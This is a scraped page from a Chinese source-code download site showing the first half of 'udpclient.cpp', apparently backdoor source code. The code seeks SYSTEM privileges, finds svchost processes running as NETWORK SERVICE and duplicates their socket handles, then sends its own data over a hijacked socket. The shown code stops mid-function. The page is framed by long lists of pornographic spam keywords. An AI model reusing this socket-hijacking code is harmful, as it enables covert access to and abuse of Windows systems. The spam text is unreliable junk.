亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關(guān)于我們
? 蟲蟲下載站

?? udpclient.cpp

?? 其中客戶端源代碼做了調(diào)整: 1. 枚舉進(jìn)程使用函數(shù)改為:CreateToolhelp32Snapshot()等。 2. 為了獲得system權(quán)限
?? CPP
?? 第 1 頁 / 共 2 頁
字號: 
/*++

  Made By ZwelL
  zwell@sohu.com
  2005.4.12
--*/

#include <winsock2.h>
#include <stdio.h>
#include <tlhelp32.h>
#include <string.h>
#include "debuglog.h"
//#include <wtsapi32.h>


#pragma comment(lib, "ws2_32")
//#pragma comment(lib, "wtsapi32")

#define NT_SUCCESS(status)          ((NTSTATUS)(status)>=0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)

#define SERVICENAME "bindport service"
#define  SVCHOSTMAX  6

typedef LONG    NTSTATUS;

typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG            ProcessId;
    UCHAR            ObjectTypeNumber;
    UCHAR            Flags;
    USHORT            Handle;
    PVOID            Object;
    ACCESS_MASK        GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
    USHORT UniqueProcessId;
    USHORT CreatorBackTraceIndex;
    UCHAR ObjectTypeIndex;
    UCHAR HandleAttributes;
    USHORT HandleValue;
    PVOID Object;
    ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;


typedef ULONG (WINAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);

ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;


VOID WINAPI MyServiceCtrlHandler (DWORD Opcode) ;

int SendMydata(SOCKET    sock);

SERVICE_STATUS          MyServiceStatus;
SERVICE_STATUS_HANDLE   MyServiceStatusHandle;
char		Logbuffer[512];

BOOL LocateNtdllEntry ( void )
{
    BOOL    ret         = FALSE;
    char    NTDLL_DLL[] = "ntdll.dll";
    HMODULE ntdll_dll   = NULL;


    if ( ( ntdll_dll = GetModuleHandle( NTDLL_DLL ) ) == NULL )
    {
        printf( "GetModuleHandle() failed");
        return( FALSE );
    }
    if ( !( ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( ntdll_dll, "ZwQuerySystemInformation" ) ) )
    {
        goto LocateNtdllEntry_exit;
    }
    ret = TRUE;

LocateNtdllEntry_exit:

    if ( FALSE == ret )
    {
        printf( "GetProcAddress() failed");
    }
    ntdll_dll = NULL;
    return( ret );
}


/*++
This routine is used to get a process's username from it's SID
--*/
BOOL GetUserNameFromSid(DWORD pid, char *szUserName)
{
    // sanity checks and default value
    HANDLE   hp=NULL;   
    HANDLE   hToken;   
    int   isok; 
    char   buf[0x400]; 
    DWORD   dwNumBytesRet;
	
    SID_NAME_USE   snu;
    TCHAR          szUser[_MAX_PATH];
    DWORD          chUser = _MAX_PATH;
    PDWORD         pcchUser = &chUser; 
    TCHAR          szDomain[_MAX_PATH];
    DWORD          chDomain = _MAX_PATH;
    PDWORD         pcchDomain = &chDomain;
  
    strcpy(szUserName, "?");
	hp=OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,   0,   pid);//0x400   is   PROCESS_QUERY_INFORMATION   
	if (hp==NULL)
	{
		sprintf(Logbuffer,"[i]OpenProcess  error  error: %d\n",GetLastError());
		logprintf(Logbuffer);
		return false;
	}
	isok=OpenProcessToken(hp,   TOKEN_QUERY,   &hToken);
	if(isok)   
 	 { 	/*
 	 	sprintf(Logbuffer,"succeed  OpenProcessToken   pid :%d\n",pid);
		logprintf(Logbuffer);
		*/
  		isok=GetTokenInformation(hToken,   TokenUser,   &buf,  sizeof(buf),   &dwNumBytesRet);   
  		if(isok)   
  		{     
  			if (LookupAccountSid(
				NULL,   
				(DWORD   *)(*(DWORD   *)buf),
				szUser, 
        		pcchUser, 
       			 szDomain, 
       			 pcchDomain, 
       			 &snu)   
			)
			{
				wsprintf(szUserName, "%s", szUser);
			}
  			CloseHandle(hToken);   
  		}   
  	}   
	else
	{
		sprintf(Logbuffer,"[^]OpenProcessToken  error  :%d\n",GetLastError());
		logprintf(Logbuffer);
	}
	/*
	sprintf(Logbuffer,"GetUserNameFromSid  returned  szUserName:%s\n ",szUserName);
	logprintf(Logbuffer);
	*/
	CloseHandle(hp);  
    return true;
}  


/*++

This routine is used to get the DNS process's Id
  
Here, I use WTSEnumerateProcesses to get process user Sid, 
and then get the process user name. Beacause as it's a "NETWORK SERVICE", 
we cann't use OpenProcessToken to catch the DNS process's token information,
even if we has the privilege in catching the SYSTEM's.

--*/
DWORD GetDNSProcessId(int  *pid,  int maxcount)
{
    //PWTS_PROCESS_INFO pProcessInfo = NULL;
    DWORD             ProcessCount = 0;
    char              szUserName[255];
    DWORD              Id = -1;
	int   index=0;

	PROCESSENTRY32 processEntry = { 0 };
    MODULEENTRY32 me32 = { 0 }; 
	
	HANDLE hProcessSnap = 
		CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hProcessSnap == INVALID_HANDLE_VALUE) return  Id;
	
	processEntry.dwSize = sizeof(PROCESSENTRY32); 
    me32.dwSize = sizeof(MODULEENTRY32); 
	BOOL bRet=Process32First(hProcessSnap, &processEntry);
	while(bRet)
	{
	
	 if (stricmp(processEntry.szExeFile,"svchost.exe")==0)
	 {
	 	sprintf(Logbuffer,"ProcessID: %d (%s)\n", 
	          processEntry.th32ProcessID,processEntry.szExeFile);
		logprintf(Logbuffer);
		
	 	 GetUserNameFromSid(processEntry.th32ProcessID, szUserName);
		 if( stricmp(szUserName, "NETWORK SERVICE") == 0)
               {
               	if (index<maxcount)
               	{
				pid[index] = processEntry.th32ProcessID;
                    	index++;
               	}
               }
              
	 }

		bRet=Process32Next(hProcessSnap, &processEntry);   
	}

	CloseHandle(hProcessSnap);
	
    	sprintf(Logbuffer,"GetDNSProcessId  return  id:  %d \n ",index);
	logprintf(Logbuffer);
    return index;
}


/*++
This doesn't work as we know, sign...
but you can use the routine for other useing...
--*/
/*
BOOL GetProcessUserFromId(char *szAccountName, DWORD PID)
{
    HANDLE hProcess = NULL, 
            hAccessToken = NULL;
    TCHAR InfoBuffer[1000], szDomainName[200];
    PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;
    DWORD dwInfoBufferSize,dwAccountSize = 200, dwDomainSize = 200;
    SID_NAME_USE snu;

    hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, PID);
    if(hProcess == NULL)
    {
        printf("OpenProcess wrong");
        CloseHandle(hProcess);
        return false;
    }

    if(0 == OpenProcessToken(hProcess,TOKEN_QUERY,&hAccessToken))
    {
        printf("OpenProcessToken wrong:%08x", GetLastError());
        return false;
    }

    GetTokenInformation(hAccessToken,TokenUser,InfoBuffer,
        1000, &dwInfoBufferSize);

    LookupAccountSid(NULL, pTokenUser->User.Sid, szAccountName,
        &dwAccountSize,szDomainName, &dwDomainSize, &snu);

    if(hProcess)
        CloseHandle(hProcess);
    if(hAccessToken)
        CloseHandle(hAccessToken);
    return true;
}*/


/*++
Now, it is the most important stuff... ^_^
--*/
SOCKET GetSocketFromId (DWORD PID)
{
    NTSTATUS                     status;
    PVOID                        buf   = NULL;
    ULONG                        size  = 1;
    ULONG                        NumOfHandle = 0;
    ULONG                        i;
    PSYSTEM_HANDLE_TABLE_ENTRY_INFO    h_info  = NULL;
    HANDLE    sock = NULL;
    DWORD    n;
	int res;

	sprintf(Logbuffer,"begin to  GetSocket  from pid :%d\n",PID);
	logprintf(Logbuffer);
    buf=malloc(0x1000);
    if(buf == NULL)
    {
        sprintf(Logbuffer,"GetSocketFromId  malloc wrong\n");
	logprintf(Logbuffer);
        return NULL;
    }
    status = ZwQuerySystemInformation( 0x10, buf, 0x1000, &n );
    if(STATUS_INFO_LENGTH_MISMATCH == status)
    {
        free(buf);
        buf=malloc(n);
        if(buf == NULL)
        {
            sprintf(Logbuffer,"GetSocketFromId  malloc wrong\n");
		logprintf(Logbuffer);
            return NULL;
        }
        status = ZwQuerySystemInformation( 0x10, buf, n, NULL);
    }
    else
    {
        sprintf(Logbuffer,"ZwQuerySystemInformation wrong\n");
	logprintf(Logbuffer);
        return NULL;
    }
	if (status!=0)
	{
		sprintf(Logbuffer,"ZwQuerySystemInformation wrong\n");
		logprintf(Logbuffer);
       	 return NULL;
	}

    NumOfHandle = *(ULONG*)buf;
	/*
	sprintf(Logbuffer,"GetSocketFromId   numofhandle  %d\n",NumOfHandle);
	logprintf(Logbuffer);
	*/
    h_info = ( PSYSTEM_HANDLE_TABLE_ENTRY_INFO )((ULONG)buf+sizeof(ULONG));

    for(i = 0; i<NumOfHandle ;i++)
    {
        try
        {	/*
        	n=i%1000;
		if (n==0)
		{
			logprintf("(i = 0; i<NumOfHandle ;i++)  n=i%1000   n==0\n");
		}
		*/
            if( ( h_info[i].UniqueProcessId== PID )  && ( h_info[i].ObjectTypeIndex== 0x1c ) 
                && (h_info[i].HandleValue!=0x6c)    // I don't know why if the Handle equal to 0x6c, in my test, it stops at getsockname()
                                            // So I jump over this situation... 
                                            // May be it's different in your system, 
                ) //wind2000 is 0x1a
            {
                //printf("Handle:0x%x Type:%08x\n",h_info[i].Handle, h_info[i].ObjectTypeNumber);
		 if( 0 == DuplicateHandle(
                    OpenProcess(PROCESS_ALL_ACCESS, TRUE, PID), 
                    (HANDLE)h_info[i].HandleValue, 
                    GetCurrentProcess(), 
                    &sock, 
                    STANDARD_RIGHTS_REQUIRED, 
                    true, 
                    DUPLICATE_SAME_ACCESS)
                    )
                {
                    sprintf(Logbuffer,"DuplicateHandle wrong:%d", GetLastError());
			logprintf(Logbuffer);
                    continue;
                }

		 sprintf(Logbuffer,"begin to  getsockname,handlevalue:0x%x.\n", h_info[i].HandleValue);
		 logprintf(Logbuffer);
                //printf("DuplicateHandle ok\n");
                sockaddr_in name = {0};
                name.sin_family = AF_INET;
                int namelen = sizeof(sockaddr_in);
                res=getsockname( (SOCKET)sock, (sockaddr*)&name, &namelen );
                if (res)
                {	/*
                	sprintf(Logbuffer,"getsockname  error  %d\n", WSAGetLastError());
			logprintf(Logbuffer);
			*/
                }
		  else
		  {
		  	logprintf("getsockname   succeed.\n");
		  }
                if(ntohs(name.sin_port)>0)    // if port > 0, then we  test  to  send  data.
                {
                    //break;
                    res=SendMydata((SOCKET)sock);
			if (res>0)break;			//sendmydata  succeed,  we  can use  this  sock!!
                }
		
            }
        }
        catch(...)
        {
            continue;
        }
	 sock=NULL;
    }

    if ( buf != NULL )
    {
        free( buf );
    }
    return (SOCKET)sock;
}


/*++
This is not required...
--*/
BOOL EnablePrivilege (BOOL   bEnable)
{
      BOOL             bResult   =  false;   
  	HANDLE             hToken;   
  	TOKEN_PRIVILEGES     TokenPrivileges;   
    
 	 if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken))   
 	 {   
  		printf("EnablePrivilege--OpenProcessToken   Error:   %d\n",GetLastError());   
  		return bResult;  
  	}   
  	TokenPrivileges.PrivilegeCount =   1;   
  	TokenPrivileges.Privileges[0].Attributes   =   bEnable   ?   SE_PRIVILEGE_ENABLED   :   0;   
  	LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&TokenPrivileges.Privileges[0].Luid);   
  	if (AdjustTokenPrivileges(hToken,FALSE,&TokenPrivileges,sizeof(TOKEN_PRIVILEGES),NULL,NULL))
  	{	/*
  		if (GetLastError()==ERROR_SUCCESS)
  		{
  			bResult=true;

?? 快捷鍵說明

復(fù)制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
成人精品一区二区三区中文字幕| 懂色av中文一区二区三区| 欧美变态tickle挠乳网站| 不卡一区二区中文字幕| 日产国产高清一区二区三区| 国产午夜精品一区二区| 91国偷自产一区二区三区观看| 日韩国产欧美视频| 亚洲伊人色欲综合网| 56国语精品自产拍在线观看| 国产很黄免费观看久久| 亚洲va欧美va国产va天堂影院| 国产亚洲成aⅴ人片在线观看| 在线精品视频免费观看| 国产成人aaa| 亚洲mv在线观看| 国产精品久久久久久久久免费桃花 | 视频一区在线视频| 国产欧美精品区一区二区三区| 欧美在线你懂的| 大美女一区二区三区| 日韩高清不卡在线| 中文字幕一区二区三| 日韩精品一区二区三区四区视频| 一本高清dvd不卡在线观看| 日本vs亚洲vs韩国一区三区二区| 中文字幕免费一区| 日韩欧美国产一区二区三区| 福利一区二区在线| 日韩综合小视频| 最新国产成人在线观看| 精品国产一区二区三区av性色| 在线一区二区三区四区| 成人久久视频在线观看| 精品一区二区三区香蕉蜜桃| 亚洲国产一区二区a毛片| 中文字幕一区二区三区视频| 久久综合久久久久88| 欧美一区二区三区婷婷月色| 欧美性欧美巨大黑白大战| av日韩在线网站| 国产69精品久久777的优势| 麻豆精品一区二区三区| 青青草一区二区三区| 亚洲va韩国va欧美va| 亚洲韩国精品一区| 亚洲一区免费视频| 欧美国产一区在线| 欧美一卡2卡三卡4卡5免费| 成人国产精品免费观看动漫| 精彩视频一区二区三区| 麻豆精品视频在线观看视频| 午夜久久久影院| 一区二区三区四区蜜桃| 日韩欧美一级在线播放| 欧美二区在线观看| 精品视频123区在线观看| 国产精品一区一区| 亚洲动漫第一页| 国产精品国产a级| 日韩免费性生活视频播放| 777亚洲妇女| 欧美一区二区性放荡片| 日韩一区二区三区四区五区六区 | 国产·精品毛片| youjizz久久| 成人免费视频网站在线观看| www.亚洲免费av| 欧美一区二区视频在线观看2022| 欧美一卡2卡3卡4卡| 亚洲精品一区二区三区影院| 欧美变态口味重另类| 久久伊人蜜桃av一区二区| 欧美国产欧美亚州国产日韩mv天天看完整| 久久久噜噜噜久噜久久综合| 国产欧美一区二区精品秋霞影院| 国产精品久久99| 亚洲最大成人综合| 秋霞国产午夜精品免费视频| 日本伊人午夜精品| 免费日韩伦理电影| 国产精品69久久久久水密桃 | 91首页免费视频| 欧美日韩你懂得| 精品国产3级a| 中文字幕日韩一区| 亚洲电影第三页| 久热成人在线视频| 福利电影一区二区三区| 在线视频观看一区| 精品国产成人在线影院| 成人欧美一区二区三区白人| 亚洲va天堂va国产va久| 美女在线视频一区| 不卡的av网站| 欧美区视频在线观看| 欧美伊人久久大香线蕉综合69| 91麻豆.com| 欧美va亚洲va国产综合| |精品福利一区二区三区| 午夜精品一区二区三区免费视频| 国产综合色在线| 91激情五月电影| 精品久久久久av影院 | 免费观看一级欧美片| 粉嫩高潮美女一区二区三区 | 26uuuu精品一区二区| 亚洲伦理在线免费看| 成人网页在线观看| 欧美色视频在线| 中文字幕欧美激情一区| 日本成人在线不卡视频| 国产精品影音先锋| 在线观看亚洲精品视频| 26uuu国产日韩综合| 亚洲成年人网站在线观看| 成人免费视频视频在线观看免费 | 美女视频网站黄色亚洲| 91亚洲大成网污www| 久久久久国产精品人| 亚洲欧美日韩一区| 亚欧色一区w666天堂| 高清国产一区二区三区| 精品国产一区二区三区久久影院| 亚洲综合在线电影| 99久久99久久精品免费观看| 欧美哺乳videos| 午夜电影网一区| 成人18视频在线播放| 5858s免费视频成人| 最新国产精品久久精品| 国产一区二区三区在线观看精品 | 久久精品国产免费| 欧美精品第1页| 樱桃国产成人精品视频| 成人国产亚洲欧美成人综合网| 久久综合99re88久久爱| 美女网站一区二区| 欧美放荡的少妇| 丝袜美腿亚洲综合| 成人在线综合网| 日韩欧美在线123| 国产高清在线观看免费不卡| 91精品福利在线一区二区三区| 亚洲午夜一区二区| 97精品视频在线观看自产线路二| 国产精品久久久久久户外露出| 国产不卡一区视频| 久久久国产精品麻豆| 精品一区二区精品| 欧美另类久久久品| 亚洲主播在线观看| 色综合天天天天做夜夜夜夜做| 亚洲精品在线免费观看视频| 久久丁香综合五月国产三级网站| 日韩午夜三级在线| 国产综合久久久久久鬼色| 欧美丰满嫩嫩电影| 午夜影院久久久| 欧美精品日韩综合在线| 亚洲欧美日韩系列| 不卡在线观看av| 亚洲精品日韩一| 欧美日韩一区二区三区高清 | 成人黄色软件下载| 久久久久综合网| 国产精品影视天天线| 国产精品免费视频网站| 91浏览器入口在线观看| 亚洲一区二区3| 日韩欧美在线不卡| 国产精品一区二区三区四区| 国产精品久久久久久久蜜臀 | 91精品国产欧美一区二区| 亚洲第一电影网| 欧美日韩成人综合天天影院| 蜜乳av一区二区| 国产农村妇女毛片精品久久麻豆| 国产在线精品免费| 精品少妇一区二区三区在线视频| 午夜精品久久久久影视| 日韩亚洲欧美高清| 国内精品伊人久久久久av一坑| 精品久久久久久久人人人人传媒 | 激情五月激情综合网| 欧美国产欧美综合| 欧美优质美女网站| 国产资源在线一区| 亚洲欧洲综合另类| 日韩精品一区二区三区三区免费| 国产精品123| 亚洲一区中文在线| 久久综合九色综合欧美98 | 欧美一二三四区在线| 国产不卡高清在线观看视频| 亚洲一区二区三区四区中文字幕 | 精品精品国产高清一毛片一天堂| 国v精品久久久网| 偷拍亚洲欧洲综合| 精品美女一区二区|